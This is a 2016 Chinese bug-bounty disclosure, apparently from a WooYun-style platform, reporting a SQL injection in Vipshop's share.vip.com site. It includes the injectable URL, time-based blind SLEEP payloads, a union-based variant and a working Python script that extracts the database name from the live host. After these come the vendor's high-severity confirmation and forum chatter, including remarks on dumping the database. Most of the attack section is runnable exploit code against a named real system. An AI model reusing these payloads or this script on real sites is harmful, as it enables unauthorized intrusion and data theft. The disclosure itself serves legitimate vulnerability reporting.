唯品会某分站SQL注入漏洞 (附利用技巧)

#1 注入点

http://share.vip.com/Acts/SetCount?id=63200

#2 PAYLOAD, 5秒后打开网页

http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP(5)))RING) and 'RING'='RING

#3 基于时间差注入

(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING)

#* 另一种注入方式

http://share.vip.com/Acts/SetCount?id=63200' and if((1=2),1,(select 1 union select 2))#

#4 EXP

#!/usr/bin/env python
 # encoding: utf-8
 # vip_new.py 
 # 
 
 import requests
 import time
 import sys
 
 reload(sys)
 sys.setdefaultencoding('utf-8')
 
 payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
 
 for i in range(1,20):
     for _str in payloads:
         start_time = time.time()
         url = "http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING) AND 'RING'='RING"
         result = requests.get(url).text
         if(time.time() - start_time) > 3:
             print _str
             break

#5 注入证明

database()
 vipshop_share
 user()
 ***

那么高端的WAF，为什么不启用呢？

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-13 17:11

厂商回复：

您好，经确认，该问题真实存在且影响高危，已联系相关人员处理，感谢对我们业务的支持与贡献！

最新状态：

暂无

1. 2016-04-13 10:04 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   2

   那么高端的WAF，为什么不启用呢？

   1# 回复此人

2. 2016-04-13 10:05 | ADVERT ( 实习白帽子 | Rank:87 漏洞数:26 | Stay hungry,stay foolish.)

   2

   学习一下。

   2# 回复此人

3. 2016-04-13 10:11 | 小苹果 ( 普通白帽子 | Rank:255 漏洞数:70 | 只要锄头挥的好，哪有洞挖不到)

   2

   怎么知道他有那么高端的waf

   3# 回复此人

4. 2016-04-13 10:11 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:110 )

   2

   那么高端的WAF，为什么不启用呢？

   4# 回复此人

5. 2016-04-13 10:13 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

   1

   又是waf惹的祸，背锅了

   5# 回复此人

6. 2016-04-13 10:14 | linkey ( 实习白帽子 | Rank:89 漏洞数:38 | sqlmap的超爱好者)

   1

   这。waf很高端？

   6# 回复此人

7. 2016-04-13 10:30 | just_joker ( 普通白帽子 | Rank:124 漏洞数:22 | ..........)

   1

   那么启用的WAF，为什么不高端呢？

   7# 回复此人

8. 2016-04-13 10:42 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

   1

   目测脱裤会触发。try it

   8# 回复此人

9. 2016-04-13 10:48 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于，我也是有ID的人了！)

   1

   @齐迹 能跑出注入点和数据库列表，但是如果尝试拖库就会封IP，是不是就是waf惹的祸？大神有识别waf的神器么？

   9# 回复此人

10. 2016-04-13 12:08 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

    1

    附带了一个利用技巧

    10# 回复此人

11. 2016-04-13 12:22 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于，我也是有ID的人了！)

    1

    @猪猪侠 猪哥威武，期待公开~~

    11# 回复此人

12. 2016-04-13 17:31 | ANS5 ( 普通白帽子 | Rank:349 漏洞数:107 | 此心安处是吾乡)

    1

    期待公开利用技巧。。。

    12# 回复此人

13. 2016-04-13 17:37 | tSt ( 普通白帽子 | Rank:109 漏洞数:30 | 在开发里运维最强，运维里网络最强，网络里...)

    1

    那么高端的WAF，为什么不启用呢？

    13# 回复此人

14. 2016-04-13 18:21 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    1

    @bit4 waf可以做到，但是你遇到的场景是不是那就不能肯定了

    14# 回复此人

15. 2016-04-13 19:02 | Rand0m ( 实习白帽子 | Rank:42 漏洞数:11 | 竟然还有人冒充我，醉了，骗子QQ：44569754...)

    1

    前排坐等公开

    15# 回复此人

16. 2016-04-14 08:29 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习，多挖洞！)

    1

    大哥，收小弟不？

    16# 回复此人

17. 2016-04-14 14:11 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

    1

    期待

    17# 回复此人